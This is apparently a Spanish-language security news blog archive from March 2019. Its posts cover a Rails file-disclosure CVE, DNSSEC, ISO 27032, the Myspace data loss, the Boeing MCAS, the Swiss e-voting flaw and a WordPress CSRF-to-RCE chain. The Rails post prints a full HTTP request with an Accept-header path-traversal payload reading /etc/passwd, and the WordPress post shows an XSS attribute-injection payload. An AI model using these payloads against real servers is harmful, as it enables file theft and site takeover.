20 mar. 2019

Acceso arbitrario a ficheros en Rails (CVE-2019-5418)

Recientemente se ha publicado una vulnerabilidad en Ruby on Rails que permite acceder arbitrariamente al contenido de los ficheros del servidor.

La vulnerabilidad está en Action View, ha sido bautizada con el CVE-2019-5418 y puede explotarse simplemente mandando una cabecera 'Accept' especialmente construida que en combinación con las llamadas a "render file:" nos mostrará en la respuesta el contenido del archivo:

GET /test HTTP/1.1
Host: SERVIDOR:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: ../../../../../../../../etc/passwd{{
Content-Length: 306
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: firstVisit=1552167456698; CSRF-Token-HOYYT=grQmu9F3Y5hazpvr6T5TtWKj4HqPFhea; sessionid-HOYYT=i3VkCeXtjRJJHUxc7xEEjbecD53xbvaN
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Las versiones de Rails que ya han sido corregidas son la 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1.

Y no es el único CVE que han publicado para RoR: atentos también a una denegación de servicio (CVE-2019-5419) y un posible RCE en development mode (CVE-2019-5420).

Toca actualizar o parchear.

ICANN solicita la implementación total de las DNSSEC

La Corporación para la Asignación de Nombres y Números en Internet (ICANN) considera que determinados componentes clave de la infraestructura del Sistema de Nombres de Dominio (DNS) actualmente se encuentran bajo un riesgo significativo.

En un momento en el que cada vez son más los informes de actividad maliciosa dirigida a la infraestructura del DNS, la ICANN solicita la implementación completa de las Extensiones de Seguridad del Sistema de Nombres de Dominio (DNSSEC) en todos los nombres de dominio que aún no cuentan con esta medida de seguridad. Asimismo, la ICANN reafirma su compromiso de participar en iniciativas de colaboración para garantizar la seguridad, estabilidad y flexibilidad de los sistemas globales de identificadores de Internet.

Como miembro del grupo de organizaciones encargadas de la gestión descentralizada de Internet, la ICANN tiene la responsabilidad específica de coordinar el nivel más alto del DNS para garantizar su funcionamiento estable y seguro, como también la capacidad de resolución universal de los nombres de dominio.

El 15 de febrero de 2019, en respuesta a distintos informes sobre ataques contra la infraestructura del DNS, la ICANN propuso una lista de verificación con medidas de seguridad para los miembros de la industria de nombres de dominio, registros, registradores, revendedores y demás actores afines con el objetivo de que tomen medidas proactivas para proteger sus sistemas, los sistemas de sus clientes y la información accesible a través del DNS.

Los informes públicos indican un patrón de ataques multifacéticos con distintas metodologías. En algunos casos, estos ataques están dirigidos al DNS y logran cambios no autorizados en la estructura de delegación de los nombres de dominio con el fin de reemplazar las direcciones de los servidores legítimos con direcciones de máquinas controladas por los atacantes. Este ataque en particular, dirigido al DNS, solamente se concreta cuando las DNSSEC no se encuentran activadas. Las DNSSEC son una tecnología desarrollada como medida de protección contra estos cambios y funcionan mediante la "firma" de datos para garantizar su validez. Si bien las DNSSEC no son la solución para todos los ataques contra el DNS, permiten detectar la modificación no autorizada de información en el DNS y evitan el redireccionamiento no autorizado de los usuarios.

La ICANN reconoce la importancia de las DNSSEC desde hace mucho tiempo y solicita su implementación completa en todos los dominios. Si bien esta medida no soluciona todos los problemas de seguridad en Internet, su objetivo es garantizar que los usuarios de Internet se conecten con el sitio que desean, evitando el denominado "ataque del intermediario" que redirecciona a los usuarios a sitios potencialmente maliciosos. Las DNSSEC son un complemento de otras tecnologías, como la Seguridad de la Capa de Transporte, normalmente utilizada en HTTPS, que protegen la comunicación entre los usuarios finales y los dominios.

Como entidad que coordina el nivel más alto del DNS, la ICANN puede ayudar a mitigar y detectar ataques relacionados con el DNS, y facilitar conversaciones clave con sus socios. La organización considera que todos los miembros del ecosistema de nombres de dominio deben trabajar juntos a fin de generar mejores herramientas y políticas para proteger al DNS y a las demás operaciones críticas de Internet. Para facilitar estas acciones, la ICANN tiene previsto llevar a cabo una sesión en la cual la comunidad podrá abordar la protección del DNS: se trata de una sesión abierta durante la reunión pública ICANN64, que tendrá lugar del 9 al 14 de marzo de 2019 en Kobe, Japón.

Fuente: ICANN

19 mar. 2019

Norma ISO 27032:Gestión de la Ciberseguridad

El concepto del Ciberespacio (y vistas las diferencias en los conceptos de Ciberseguridad y Seguridad de la Información) exige tener una visión más amplia de conceptos de la seguridad de la información que hasta el momento se estaban teniendo en cuenta. Este nuevo concepto aúna aspectos relacionados con la interacción de personas, software y servicios en Internet, soportados por entornos TIC distribuidos por todo el mundo con una complejidad y particularidad que hace unos años no era imaginable.

La Normativa ISO 27032 es un nuevo estándar de ciberseguridad publicada en Julio de 2012 por La Organización Internacional de Normalización (ISO).

Para abordar los retos de la Ciberseguridad, que consiste en la seguridad en el Ciberespacio, surge la norma ISO/IEC 27032, que define las Guías en este ámbito y se centra en dos áreas: por un lado, en cubrir los espacios o huecos no cubiertos por normas anteriores de seguridad en este ámbito conceptual más amplio, en el que aparecen nuevos ataques y los riesgos asociados a éstos; y, por otro lado, el proceso de colaboración entre los agentes que operan en el entorno actual, en lo que se denomina comúnmente un Marco de Ciberseguridad o CSF, CyberSecurity Framework.

Atendiendo al reto de los escenarios actuales de la Ciberseguridad y gracias a la amplia experiencia del equipo de Internet Security Auditors, diseñamos una metodología que permite implementar CSF basado en el estándar ISO/IEC 27032:2012 que incluye cuatro focos de trabajo o dominios:
  1. Seguridad de la información
  2. La Seguridad en la Redes
  3. Seguridad en Internet
  4. Protección de las Infraestructuras

El Marco de Ciberseguridad que se desarrollará tendrá un acercamiento en la gestión de riesgos en 4 áreas:
  • Prevención: La prevención se basa en la implantación de medidas y controles que limiten y contengan los impactos de posibles eventos de ciberseguridad
  • Protección y Detección: Donde se implementan controles destinados a la gestión de la seguridad y la monitorización de eventos de seguridad con el fin de detectar y protegerse ante este tipo de eventos
  • Respuesta y Comunicación: Debemos estar preparados ante posibles incidentes relacionados con la ciberseguridad y constará de acciones para mitigar elementos adversos una vez se hayan materializado
  • Recuperación y Aprendizaje: Acciones para restaurar los sistemas y servicios relacionados con el ciberespacio y se definirán procedimientos para reducir la probabilidad de ocurrencia de estos incidentes
El proceso seguido en nuestra metodología se desarrolla en cinco fases.
Proceso seguido en nuestra metodología se desarrolla en cinco fases

Fase I: Entendimiento de la Organización

En esta primera fase se realiza un trabajo importante de inmersión en los procesos de la empresa para conocer el funcionamiento de éstos y que uso realizan del Ciberespacio sus servicios. Para llevar a cabo esta tarea será necesario:
  • Revisar productos y servicios
  • Revisar el marco normativo de seguridad en uso
  • Recopilar y revisar documentación de seguridad
  • Conocer los flujos de información en los procesos
  • Conocer las medidas técnicas de seguridad implementadas, etc
Esta fase permitirá también disponer de un inventario de activos de los servicios en el alcance.

Fase II: Análisis de Riesgos

La toma de decisiones en cuanto a los controles y medidas de seguridad que se van a implementar debe estar basada en la gestión de los riesgos y el alineamiento con las necesidades de la empresa. Es por ello que, en esta fase, se llevará a cabo esta evaluación considerando, entre otros, aspectos como:
  • Activos críticos
  • Amenazas
  • Vulnerabilidades
  • Impacto y riesgo
  • Responsabilidades
Esta tarea se lleva a cabo con alineamientos a normas reconocidas a nivel internacional, que permiten su mantenimiento y gestión en el tiempo.

Fase III: Plan de Acción

En esta fase, y gracias al trabajo realizado en las fases anteriores, se redactará el plan que permita conocer la priorización y medidas que deberán desarrollarse para la consecución de los alineamientos de la ISO/IEC 27032:2012 en base a las exigencias del negocio.

Este Plan afrontará diferentes estrategias que incluirán y deberán aplicarse a diferentes niveles de la organización, incluyendo:
  • Políticas
  • Identificación de roles
  • Métodos de implementación
  • Procesos afectados
  • Controles tecnológicos

Fase IV: Implementación

Como tal, esta es la etapa que más esfuerzos va a requerir habitualmente dado que es en la que todas las acciones definidas en la fase anterior se plasmarán en el Plan de Acción. Es importante tener presente que la ISO/IEC 27032:2012 pretende obligar a quien la implemente, a ser proactivo en las medidas de seguridad, con énfasis importante en los mecanismos de prevención en los procesos que hacen uso del Ciberespacio.

Esta fase del proyecto se focalizará entonces en la implementación de controles que deberán tener en cuenta el nivel de madurez en la gestión de la seguridad existente y que considerará, entre otros, aspectos como:
  • Existencia de Política de Seguridad
  • Procedimientos de Seguridad en SDLC
  • Marcos existentes para el intercambio de información
  • Planes de concienciación del personal
  • Metodología de AARR
  • Monitorización TIC
  • Gestión de incidentes
Además de esto, en esta fase del proyecto se establecerán controles adicionales que incluirán:
  • Controles a nivel de aplicación: gestión de sesiones, validación de datos, protección ante ataques, procesos de autenticación, etc
  • Controles a nivel de servidores: configuraciones seguras, gestión de parches, monitorización., revisiones periódicas, etc
  • Controles para los usuarios finales: Actualizaciones de SO, uso de aplicaciones, antivirus, herramientas y configuraciones de seguridad, etc
  • Controles contra ataques de Ingeniería social: Programas de concienciación, pruebas regulares, controles de seguridad, etc.
La Norma ISO/IEC 27032 pretende garantizar la seguridad en los intercambios de información en la Red para lograr hacer frente de una manera más efectiva al Cibercrimen con más cooperación entre todos.

Con esta norma ISO/IEC 27032:2012 se ha creado un nuevo marco para mejorar la seguridad en internet. La norma ISO 27032 está totalmente orientada a intentar garantizar un entorno seguro a través de directrices de seguridad.

Fuente: ISECAuditores

Myspace perdió sus datos en una migración

¿Recuerdan Myspace? La otrora gigantesca red social donde podías compartir, fotos, música y obviamente ver a tus amigos.

Sucede que durante una migración de servidores, todo se fue al demonio y las fotos y canciones subidas entre 2003 y 2015 se borraron, para siempre. Según informa The Verge, no existe forma de que se recupere la información y por cierto, nos deja un recordatorio que de vez en cuando es bueno repetir: la nube no existe, es solo el computador de alguien más.

Toda la música que los usuarios subieron a la red se fue. En un un email enviado a Redditor u/austinjckson, Oficial de Privacidad de Datos (DPO) de la compañía confirmó que "los archivos de migración del servidor estaban dañados y no se pudieron transferir a nuestro sitio actualizado" (a través de BoingBoing).

La noticia de que los archivos pueden haberse perdido apareció por primera vez hace un año cuando la compañía dijo que estaba experimentando un problema con las canciones o los videos que se actualizaron hace más de tres años. En ese momento, Myspace dijo que el problema se solucionaría, aunque no pudo decir cuándo. Desafortunadamente, ahora parece que esta solución no fue posible y "no hay manera de recuperar los datos perdidos".

Ha pasado un año desde que los enlaces de música en Myspace dejaron de funcionar; Al principio, la compañía insistió en que estaban trabajando en ello, pero ahora han admitido que todos esos archivos se han perdido: "Como resultado de un proyecto de migración del servidor, todas las fotos, videos y archivos de audio que subió hace más de tres años. es posible que ya no esté disponible en o desde MySpace. Le pedimos disculpas por las molestias y le sugerimos que guarde sus copias de seguridad. Si desea obtener más información, comuníquese con nuestra Oficial de Protección de Datos, la Dra. Jana Jentzsch a [email protected]".

Sí, al parecer tienes que recuperar tus backups, porque ellos no los tienen.

Algún día, esto sucederá con Facebook, Instagram, Tumblr, etc. No se debe confiar en estas plataformas para archivar datos personales.

Fuente: The Verge

Boeing 737 MAX 8: qué es MCAS, el software de control de vuelo

En menos de cinco meses, dos aviones Boeing 737 MAX 8 han protagonizado accidentes fatales: un vuelo en octubre de Lion Air y otro de Ethiopian Airlines el domingo.

Las autoridades investigan las causas pero la similitud entre ambos incidentes y las "fallas técnicas" en el primero han situado al software de la aeronave en el foco mediático.

En ambos casos el avión perdió altitud poco después del despegue, impactando a los pocos minutos contra el suelo, sin dejar sobrevivientes.

Además, se sabe que el vuelo de Lion Air había sufrido "problemas técnicos" un día antes del accidente, según un libro de registro de vuelo al que tuvo acceso la BBC a finales de octubre.

Este miércoles, luego de la inmensa presión internacional y de que decenas de países y aerolíneas suspendieran el uso del 7373 MAX, Boeing recomendó finalmente suspender toda su flota MAX.

La FAA, que sostuvo hasta este miércoles que el modelo de avión era seguro, explicó en un tuit que nuevas pruebas desde el sitio del accidente en Etiopía "junto con datos satelitales" llevaron a la decisión de dejar en tierra a estos aviones.

Indicó, además, que la decisión se mantendrá vigente "hasta que se realicen investigaciones adicionales", incluido el examen de las cajas negras y las grabaciones de voz de la cabina de la aeronave siniestrada en Etiopía.

Una "mejora" de software

El Boeing 737 MAX 8 es una versión actualizada del 737 que está en uso comercial desde apenas el año 2017.

Una de las diferencias con el modelo anterior es que el conocido como sensor de "ángulo de ataque" y el software conectado al mismo funcionan de manera distinta. El software de control de vuelo es un sistema denominado MCAS (Maneuvering Characteristics Augmentation System). Fue desarrollado por Boeing expresamente para el 737 MAX 8 y el MAX 9.

Boeing dice que ese software "no controla la aeronave en vuelos normales, sino que mejora una parte de su comportamiento en condiciones operativas no normales". También señala que MCAS se implementó en los aviones para mejorar su manejo y su tendencia a inclinarse en ángulos de ataque elevados.

Pero los investigadores del accidente de Indonesia descubrieron que el sensor que el software del avión pudo haber activado un sistema "anticalado", anulando los controles manuales. Eso habría podido resultar en que la nariz del avión se inclinara hacia el suelo.
Avión
Además, según una base de datos gubernamental de incidentes de aviación (a la que tuvo acceso el diario The New York Times), al menos dos pilotos que manejaron aviones Boeing 737 MAX 8 en rutas aéreas en Estados Unidos expresaron su preocupación en noviembre por cómo la nariz de la aeronave se inclinaba repentinamente hacia abajo tras activar el sistema automático.

En ambos casos, los conductores dicen que lograron retomar el control de la aeronave tras desactivar el piloto automático. Uno de los pilotos dice que el descenso comenzó dos o tres segundos después de haberlo activado.

Los problemas que experimentaron esos pilotos se asemejarían a los que tuvieron quienes manejaron el vuelo fatal de Lion Air en Indonesia el pasado octubre.

Este lunes 11 de marzo, horas después del accidente en Etiopía, Boeing emitió un comunicado en su sitio web anunciando que está trabajando en una "mejora" de ese software. En el texto, apenas menciona la tragedia de Ethiopian Airlines, pero sí vincula la "actualización" del software al accidente de Lion Air hace seis meses.

"Boeing ha estado trabajando en estrecha cooperación con la FAA en el desarrollo, planificación y certificación de la mejora de software y será aplicada en la flota 737 MAX en las próximas semanas. La actualización también incorpora los comentarios recibidos de nuestros clientes", declaró la compañía.

Posible desafío

La compañía asegura que la actualización de su software está diseñada para "hacer que una nave segura sea todavía más segura". Pero algunos dudan que la nave sea tan segura como dice Boeing.

"Es muy pronto para especular porque todavía no tenemos la información de hasta qué punto está relacionado el accidente de Ethiopian Airlines con el de Lion Air", le dijo a la BBC Marc Szepan, un académico del Saïd Business School, en la Universidad de Oxford, Reino Unido, que trabajó como ejecutivo en la aerolínea alemana Lufthansa.

"Si es así -y esa es una gran suposición- y resulta que fue exactamente la misma causa principal y que tiene que ver con el MCAS, entonces Boeing tendrá un desafío todavía más grande por resolver".

Szepan dice que ese software "está en el corazón de la certificación de la aeronave y no es algo que se pueda cambiar sencilla y fácilmente".

"Extraordinariamente raro"

Una decena de países -incluidos China, Australia, Reino Unido y Singapur- y más de una decena de aerolíneas -como Aeroméxico y Aerolíneas Argentinas- han retirado del servicio este modelo.

Además, la Unión Europea cerró su espacio aéreo para estos aviones. Dos días después, Canadá y Estados Unidos se sumaron a la suspensión.

Szepan dice que poner en tierra un modelo nuevo de aviones es algo "extraordinariamente raro". "La última vez que vimos algo así fue en 2013, cuando la FAA retiró del servicio otro Boeing, el 787, por un problema con las baterías".

Szepan señala que todavía no se conoce la causa principal del accidente de Etiopía, pero advierte que "desde un punto de vista reputacional, Boeing tiene que ser muy cuidadoso". El Boeing 737 MAX 8 fue el avión que más rápidamente vendió la compañía en toda su historia.

La crisis de seguridad de este modelo podría poner en riesgo la entrega de los cerca de 4.700 pedidos que ya tiene acordados.

Fuente: BBC en español

18 mar. 2019

Diferencias entre la Ciberseguridad y la Seguridad de la Información

Publicado originalmente por Amit Singh Bhadauriya en CISOPlatform

Comprender las diferencias entre términos como "Ciberseguridad" y "Seguridad de la Información" es importante porque muchos organismos reguladores han pedido a los bancos y otras entidades financieras que tengan políticas de ciberseguridad y de seguridad por separado.

Estas dos palabras "Ciberseguridad" y "Seguridad de la Información" se usan generalmente como sinónimos en la terminología de seguridad, y crean una gran confusión entre los profesionales de la seguridad. Estaba discutiendo con algunos profesionales de InfoSec sobre este tema y descubrí que algunos de ellos piensan que la ciberseguridad es un subconjunto de Seguridad de la Información, mientras que otros piensan lo contrario. Entonces, para aclarar esta confusión, decidí investigarlo.

Vamos a empezar con la Seguridad de los Datos: se trata de proteger los datos. Ahora, otra pregunta que surge aquí es la diferencia entre Datos e Información. No todos los datos son información. Los Datos pueden ser llamado Información cuando se interpretan en un contexto y se les da un significado. Por ejemplo, "14041989" es un dato; si sabemos que esta es la fecha de nacimiento de una persona, entonces es información. Entonces, Información son Datos que tienen algún significado en un contexto determinado. La Seguridad de la Información se trata de proteger la Información, que generalmente se centra en la Confidencialidad, Integridad y Disponibilidad (CID) de la Información.

La Ciberseguridad se trata de asegurar cosas que son vulnerables a través de las Tecnologías de la Información y las Comunicaciones (TIC). También considera que donde se almacenan los datos y se utilizan tecnologías para asegurarlos. Parte de la Cibeseguridad trata la protección de las TIC, es decir, hardware y software; incluye información, tanto física como digital, y automóviles, semáforos, aparatos electrónicos, etc.

El siguiente diagrama de Venn puede ser útil para comprender las diferencias.
Referencia: Center for Cyber and Information Security - https://ccis.no/cyber-security-versus-information-security/
El lado izquierdo representa la Seguridad de la Información, que consiste en información tanto digital como analógica. El lado derecho representa la Ciberseguridad, cosas que son vulnerables a través de las TIC. Tenga en cuenta que la seguridad de TI es la protección de las Tecnologías de la Información. En la práctica, no hay diferencia entre la seguridad de las TIC y la seguridad de TI.

Como se puede ver en la siguiente imagen, ambos conjuntos se superponen. El siguiente diagrama ilustra la relación entre la seguridad de las TIC, la Ciberseguridad y la Seguridad de la Información.
Referencia: Center for Cyber and Information Security - https://ccis.no/cyber-security-versus-information-security/
Tenga en cuenta que la Ciberseguridad (conjunto derecho) incluye todo a los que se puede acceder a través del ciberespacio. Entonces, se podría argumentar que todo en este mundo es vulnerable a través de las TIC.

Según la definición del NISTIR 7298 Revision 2 (Instituto Nacional de Estándares y Tecnología).
  • Ciberseguridad: capacidad de proteger o defender el uso del ciberespacio de los ataques cibernéticos.
  • Seguridad de la Información (1): protección de la información y los sistemas de información frente al acceso, uso, divulgación, interrupción, modificación o destrucción no autorizados para brindar Confidencialidad, Integridad y Disponibilidad.
  • Seguridad de la Información (2): Proteger los sistemas de información e información del acceso, uso, divulgación, interrupción, modificación o destrucción no autorizados para proporcionar:
    • Integridad, protegerse contra la modificación o destrucción inapropiada de la información, e incluye garantizar la no repudio y la autenticidad de la información.
    • Confidencialidad, preservar las restricciones autorizadas de acceso y divulgación, incluidos los medios para proteger la privacidad personal y la información de propiedad exclusiva; y
    • Disponibilidad, garantizar el acceso y uso oportuno y confiable de la información.

Resumiendo

  • Seguridad Informática: todas aquellas medidas tomadas para proteger la integridad y la privacidad de la información almacenada en un sistema informático y signifique un riesgo si llega a manos de otras personas. Se puede referir a software, base de datos y archivos entre otros.
  • Seguridad de la Información: trata con la información, independientemente de su formato. Abarca documentos impresos, digitales y propiedad intelectual en la mente de las personas y las comunicaciones verbales o visuales.
  • Ciberseguridad: se refiere a la protección de los activos digitales, todo desde las redes hasta el hardware y la información que es procesada, almacenada o transportada por sistemas de información interconectados. Tiene como foco la protección de la información digital.
Según esta definición, la Ciberseguridad tiene que ver con la seguridad de cualquier cosa en el ámbito cibernético, mientras que la Seguridad de la Información tiene que ver con la seguridad de la información, independientemente del ámbito. Por lo tanto, a partir de estas definiciones, se puede pensar que la Seguridad de la Información es un super conjunto de Ciberseguridad.

Fuente: Amit Singh Bhadauriya en CISOPlatform

Descubierta vulnerabilidad en el sistema de voto electrónico de Suiza

Investigadores de distintos países reportaron de manera independiente el hallazgo de una vulnerabilidad en el sistema de votación electrónico de Suiza que se utiliza en dicho país. Según publicó Swiss Post, se trata de una falla crítica en el código fuente relacionado con la verificabilidad universal.



Un grupo de investigadores de ámbito internacional han descubierto un fallo crítico de seguridad en el sistema de voto electrónico que se pretendía utilizar este año en las elecciones de Suiza.


El fallo se encuentra en el subsistema encargado de verificar que el número de votos contabilizado coincide con el número de votos y papeletas emitidas por los votantes. Esta vulnerabilidad permitiría a un atacante reemplazar una papeleta por otra sin ser detectado.

El desarrollo ha sido llevado a cabo por la empresa Scytl, junto con el servicio postal Suizo, quien intenta quitarle importancia al asunto alegando que para poder explotar satisfactoriamente la vulnerabilidad habría que tener acceso al sistema informático de la Swiss Post y tener un profundo conocimiento de sus infraestructuras.

Para Matthew Green y Sarah Jamie Lewis, encargados de la investigación, este fallo es inadmisible y aunque Scytl dice haber subsanado el error, su mera existencia debería plantear serias dudas sobre la integridad del sistema.

Los mecanismos criptográficos para verificar la legitimidad de los votos están implementados de manera incorrecta. Además, el diseño general del sistema es enrevesado, lo que dificulta evaluar eficazmente las medidas de seguridad implementadas.

El funcionamiento del sistema requiere que los votantes se identifiquen en la web con su fecha de nacimiento y un código recibido de Swiss Post por correo. Una vez el votante hace su elección, su voto se cifra y se envía a los servidores de Swiss Post, donde se procesará a través de una "red mixta" que mezclará los votos según un mecanismo criptográfico para anonimizarlos. Una vez "barajados" los votos se procederá a contabilizarlos y desencriptarlos.

Para anonimizar los votos se utiliza un esquema de cuatro máquinas, encargadas de aplicar varios procesos de cifrado y mezcla antes de enviarlas al último servidor. Este sistema utiliza lo que se conoce como "prueba de conocimiento cero" para verificar que los votos recibidos no han sido manipulados y se corresponden con los emitidos por los votantes.

Un fallo en este último punto permitiría a un atacante intercambiar los votos sin que la prueba de conocimiento falle, haciendo indetectable el fraude.

Swiss Post ha sometido el sistema a varias auditorías y aunque la naturaleza del error no hace sospechar que haya sido deliberado, los investigadores plantean dudas sobre por qué el fallo no fue detectado en anteriores auditorías y si otros sistemas de Scytl están afectados.

Scytl lidera el desarrollo de soluciones de votación por Internet y está presente en al menos 42 países y 1.400 condados de EEUU.

Hasta el 24 de marzo, Swiss Post tiene abierto un programa de "bug bounty" que pagará recompensas de hasta 20.000 francos suizos a todo aquel que consiga manipular los votos, o hasta 50.000 en el caso de hacerlo sin ser detectados. En las próximas semanas se harán públicos todos los problemas que se hayan encontrado.

Los investigadores que reportaron el fallo no lo hicieron en el marco del programa de bug bounty, aunque sí utilizaron el código fuente que se publicó para que los especialistas que se postularan al programa de recompensas pudieran realizar pruebas.

17 mar. 2019

Informe sobre las Amenazas para la Seguridad en Internet [Symantec]

El Informe sobre las Amenazas para la Seguridad en Internet 2019 de Symantec profundiza en los conocimientos de la red civil de inteligencia global más grande del mundo.
El informe revela:
  • Los ataques de Formjacking se dispararon, con un promedio de 4.800 sitios web comprometidos cada mes.
  • El ransomware migró de objetivo, de los consumidores a las empresas, donde las infecciones aumentaron un 12 %.
  • Más de 70 millones de registros de buckets S3 con malas configuraciones son robados como resultado de una adopción de la nube demasiado acelerada.
  • Las cadenas de suministro siguen siendo un objetivo bastante lucrativo presentando un aumento de un 78 %.
  • IoT fue un punto de entrada clave para los ataques dirigidos; la mayoría de los dispositivos de IoT son vulnerables.
La investigación exhaustiva está basada en 123 millones de sensores que registran miles de eventos de amenazas cada segundo desde 157 países y territorios. Utilice esta inteligencia incomparable para su beneficio al descargar el Informe sobre Amenazas para la Seguridad en Internet de Symantec 201.

Fuente: Symantec

16 mar. 2019

Curso de Introducción a Seguridad Informática (gratis y para chicas :)

Sheila A. Berta (aka @UnaPibaGeek) ha abierto la pre-inscripción a su curso de Introducción a Seguridad Informática presencial, que será dictado durante el mes de abril en el Museo de Informática.

¿Quienes pueden tomar el curso?

Mujeres cis y trans-género interesadas en aprender seguridad informática.
No hay limitaciones por edad. No se requieren conocimientos previos.

¿Cuándo y dónde?

El curso se compone por 4 clases que se dictarán en las siguientes fechas:
  • Clase 1: Miércoles 3 de abril de 19 a 21hs
  • Clase 2: Miércoles 10 de abril de 19 a 21hs 
  • Clase 3: Miércoles 17 de abril de 19 a 21hs 
  • Clase 4: Miércoles 24 de abril de 19 a 21hs
Todas las clases se impartirán en el Museo de Informática ubicado en: Marcelo T. de Alvear 740, Retiro, Ciudad Autónoma de Buenos Aires.

Inscripción

Afortunadamente hay mucho interés en el curso y los cupos son limitados. Por eso, una vez que te hayas postulado, te enviarán un correo de confirmación con el que asegurarás tu lugar dentro del curso. Va a haber nuevas ediciones del mismo para poder seguir introduciendo mujeres en el mundo de la Seguridad Informática.

Si estás segura que este curso es para vos, te invito a postularte. Por favor, antes de completar este formulario, asegúrate de leer la información que se detalla y el temario.

Actualización: la preinscripción ya cerró.

15 mar. 2019

WordPress: vulnerabilidad permite ejecución remota de código sin autenticar.

Una nueva vulnerabilidad, descubierta por el investigador Simon Scannell de RIPS, en el popular gestor de contenidos (CMS) WordPress, permite la ejecución remota de código sin necesidad de autenticación en versiones anteriores a 5.1.1.

El impacto de la vulnerabilidad, según el autor, permite aprovechar el sistema de comentarios del CMS – característica que viene habilitada por defecto – para combinar un ataque por CSRF y varias configuraciones erróneas en las partes del código encargadas de sanear los inputs del usuario. La combinación de ambos factores permite una ejecución remota de código (RCE).

Del CSRF a la inyección HTML

WordPress no utiliza ningún sistema de evaluación de CSRF cuando un usuario publica un comentario, lo que significa que un atacante puede publicar comentarios suplantando a un usuario con permisos administrativos.

En tanto que un adminstrador está autorizado por WordPress para publicar comentarios que contengan código HTML – etiquetas [script] incluidas – esto puede llevar de manera plausible a un ataque por inyección de HTML.

La manera en la que WordPress pretende solventar este riesgo, es utilizar un identificador único (nonce) para los administradores en el formulario de comentarios. Si la petición del administrador suministra correctamente el nonce, entonces el comentario es creado sin ningún tipo de saneamiento. Si el nonce es inválido, el comentario se publica igualmente, pero pasa previamente por la función para sanearlo.

Esto permite que un atacante publique comentarios que contienen muchas más etiquetas y atributos HTML de lo que normalmente se debería permitir. Sin embargo, aunque wp_filter_post_kses () es mucho más permisivo, elimina las etiquetas HTML y los atributos que podrían conducir a vulnerabilidades XSS.

De la inyección HTML al XSS persistente

El hecho de poder inyectar HTML adicional, lleva directamente a la posibilidad de un ataque XSS con persistencia, en tanto que muchas de las etiquetas HTML que normalmente no podrían incluirse, son ahora manipuladas y parseadas de una manera defectuosa que nos llevan, según el autor, a una inyección arbitraria de atributos.
Un atacante puede crear un comentario que contenga una etiqueta [a] y establecer, por ejemplo, el atributo de título del enlace a title = ‘XSS “onmouseover = alert (1) id =”‘. Este atributo es válido y la función de saneamiento lo dejaría pasar. Esto funciona debido a que el valor de title usa comillas simples. Cuando los atributos se concatenan, el valor de [title] se ajusta entre comillas dobles (línea 3018). Esto significa que un atacante puede inyectar atributos HTML adicionales al inyectar una comilla doble adicional que cierra el atributo title.

Por ejemplo:
[a title='XSS "onmouseover=evilCode() id="']
Se convertiría en:
[a title="XSS "onmouseover=evilCode() id=" "]
Como el comentario ya se ha saneado en este punto, el atributo que controla eventos de ratón, en este caso, onmouseover, se almacena en la base de datos y no se elimina. Esto permite a los atacantes realizar un XSS con persistencia en el sitio web de destino al encadenar este defecto de la función de saneamiento con la vulnerabilidad CSRF.

Ejecutando XSS directamente de un iframe

El siguiente paso para obtener la RCE requiere que el administrador ejecute el JavaScript inyectado visitando el sitio malicioso. El comentario se muestra en la interfaz del blog de WordPress. Dado que la interfaz no está protegida por el encabezado X-Frame, el comentario con el payload se puede mostrar en un iframe oculto en el sitio web del atacante. Dado que el atributo inyectado es un controlador de eventos onmouseover, el atacante puede hacer que el iframe active el XSS instantáneamente con el movimiento del ratón de la víctima. Toda la ejecución del JavaScript ocurre en segundo plano, sin que el administrador de la víctima se haya dado cuenta.

De JavaScript a la RCE final

Con la posibilidad de ejecutar código JavaScript arbitrario con la sesión del administrador, la ejecución remota de código es prácticamente trivial. De forma predeterminada, WordPress permite a los administradores de un blog editar directamente los archivos .php de temas y complementos desde el panel de administración. Simplemente insertando una puerta trasera PHP, el atacante puede obtener la ejecución de código PHP arbitrario en el servidor remoto.

Aquí puede verse un análisis y paso a paso completo: WordPress 5.1 CSRF + XSS + RCE – Poc.

Fuente: Hispasec